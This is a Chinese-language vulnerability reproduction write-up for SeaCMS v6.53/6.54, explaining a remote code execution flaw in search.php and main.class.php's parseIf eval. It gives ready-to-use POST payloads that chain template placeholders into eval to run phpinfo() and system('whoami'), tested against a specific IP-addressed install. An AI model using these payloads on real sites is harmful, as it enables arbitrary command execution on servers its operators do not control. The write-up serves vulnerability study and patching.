海洋cms v6.53 v6.54版本漏洞复现

参考

https://www.freebuf.com/vuls/150042.html
https://www.jianshu.com/p/a3a18f233184?tdsourcetag=s_pctim_aiomsg

cms首页地址为：http://139.155.1.64/seacms(v6.53)/upload/
漏洞存在地址为：http://139.155.1.64/seacms(v6.53)/upload/search.php
抓包发送已知的poc：

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

得到php的当前信息，之后可执行任意命令：

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem("whoami");

这是执行whoami命令得到的结果：

现在来分析一下原因：
打开search.php分析源码：

在echoSearchPage() 函数里面可以看见这样一段代码

........
$jq = RemoveXSS(stripslashes($jq));
$jq = addslashes(cn_substr($jq,20));

$area = RemoveXSS(stripslashes($area));
$area = addslashes(cn_substr($area,20));

$year = RemoveXSS(stripslashes($year));
$year = addslashes(cn_substr($year,20));

$yuyan = RemoveXSS(stripslashes($yuyan));
$yuyan = addslashes(cn_substr($yuyan,20));

$letter = RemoveXSS(stripslashes($letter));
$letter = addslashes(cn_substr($letter,20));

$state = RemoveXSS(stripslashes($state));
$state = addslashes(cn_substr($state,20));

$ver = RemoveXSS(stripslashes($ver));
$ver = addslashes(cn_substr($ver,20));

$money = RemoveXSS(stripslashes($money));
$money = addslashes(cn_substr($money,20));

$order = RemoveXSS(stripslashes($order));
$order = addslashes(cn_substr($order,20));
.....  ... ...


function echoSearchPage()  
{
if(intval($searchtype)==5)
	{
		..... ...  ....... ..........
		$content = str_replace("{searchpage:type}",$tid,$content);
		$content = str_replace("{searchpage:typename}",$tname ,$content);
		$content = str_replace("{searchpage:year}",$year,$content);
		$content = str_replace("{searchpage:area}",$area,$content);
		$content = str_replace("{searchpage:letter}",$letter,$content);
		$content = str_replace("{searchpage:lang}",$yuyan,$content);
		$content = str_replace("{searchpage:jq}",$jq,$content);
		$content = str_replace("{searchpage:state}",$state2,$content);
		$content = str_replace("{searchpage:money}",$money2,$content);
		$content = str_replace("{searchpage:ver}",$ver,$content);
		.....  ......  ...........

removeXSS,addslashes函数对这些变量有限制，截取了前20个字节，即每个参数只能传入20个字节长度的限制

searchtype=5是高级搜索的入口，并且对{searchpage:type}，{searchpage:area}…等变量都进行了替换；替换成对应的变量，但是这些变量是我们可以控制输入的，因此，漏洞产生；

	$content=replaceCurrentTypeId($content,-444);
	$content=$mainClassObj->parseIf($content);
	$content=str_replace("{seacms:member}",front_member(),$content);
	$searchPageStr = $content;
	echo str_replace("{seacms:runinfo}",getRunTime($t1),$searchPageStr) ;

这段代码是将content的值传给/main.class.php
然后到/main.class.php里面去看看：
parseIf函数将content变量传入，并且content里面必须要存在{if：
虽然有很多条件，但都存在着命令执行函数eval

现在分析POC：
首先searchtype=5是进入高级搜索的条件，然后searchword是我们的content：

将{searchpage:year}换成$year,

{searchpage:letter}换成$letter;

{searchpage:lang}换成$yuyan;

{searchpage:jq}换成$jq;

{searchpage:ver}换成$ver;

再在后面补充各个变量的值，所以以上的POC实际上是：

所以以上的POC实际上是：

 searchtype=5&searchword={if:eval(join($_POST[9]))}&9[]=ph&9[]=pinfo();

利用base64_decode的数组漏洞将9[]=真正的命令传入
在/main.class.php里面，传入的content里面含有{if:，所以返回eval，并且执行命令；

	function parseIf($content){
		if (strpos($content,'{if:')=== false){
		return $content;
		}else{
		....
		@eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}");

所以最终执行的是：
@eval("if(eval(join($_POST[9]))){\$ifFlag=true;}else{\$ifFlag=false;}");